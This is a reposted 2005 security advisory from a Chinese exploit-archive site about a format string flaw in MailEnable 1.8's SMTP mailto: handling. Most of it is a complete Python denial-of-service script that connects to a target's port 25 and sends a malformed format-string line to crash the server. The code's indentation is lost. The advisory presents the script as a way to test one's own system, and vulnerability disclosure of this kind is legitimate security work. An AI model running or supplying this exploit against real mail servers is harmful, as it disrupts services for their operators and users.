首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MailEnable Format String Vulnerability
来源:http://www.see-security.com 作者:tal 发布时间:2005-03-24  

MailEnable Format String Vulnerability

Summary
MailEnable's "mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows".

MailEnable contains a format string vulnerability in the it handles SMTP mailto: requests, the following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by a a .
The original exploit can be found: http://www.hackingdefined.com/exploits/mailenable.tar.gz

Details
Vulnerable Systems:
* MailEnable version 1.8

Exploit:
#################################
# #
# See-security Technologies ltd. #
# #
# http://www.see-security.com #
# #
#################################
# #
# MailEnable 1.8 Format String DoS exploit #
# #
# Discovered by Mati Aharoni #
# #
# Coded by tal zeltzer #
# #
#################################


import sys
import time
import socket


def PrintLogo():
print "#################################"
print "# #"
print "# See-security Technologies ltd. #"
print "# #"
print "# http://www.see-security.com #"
print "# #"
print "#################################"
print "#"+" "*64+"#"
print "# MailEnable 1.8 Format String DoS exploit #"
print "#"+" "*64+"#"
print "# Discovered by Mati Aharoni #"
print "# #"
print "# Coded by tal zeltzer #"
print "#"+" "*64+"#"
print "#"*66+"\n"


PrintLogo()
if (len(sys.argv) != 2):
print "\n\n"
print sys.argv[0] + " [Target Host]"
sys.exit()
sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[-] Connecting to " + sys.argv[1]
sSmtpSocket.connect((sys.argv[1],25))
print "[-] Connected to " + sys.argv[1]
print "[-] Sending malformed packet"
sSmtpSocket.send("mailto: %s%s%s\r\n")
sSmtpSocket.close()
print "[-] Malformed packet sent"

EOF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ocean FTP DoS (Exploit)
·Microsoft Windows WAB DoS
·phpBB UID Exploit (Perl Exploi
·LimeWire File Disclosure Explo
·FreeCiv Server DoS Exploit
·OpenMosixView Multiple Race Co
·MCPWS Personal DoS Exploit
·Tincat Buffer Overflow
·Linux Kernel 2.4.x / 2.6.x use
·Smail preparse_address_1() Hea
·Linux Kernel <= 2.6.11 sys_
·FunLabs Games Multiple Vulnera
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved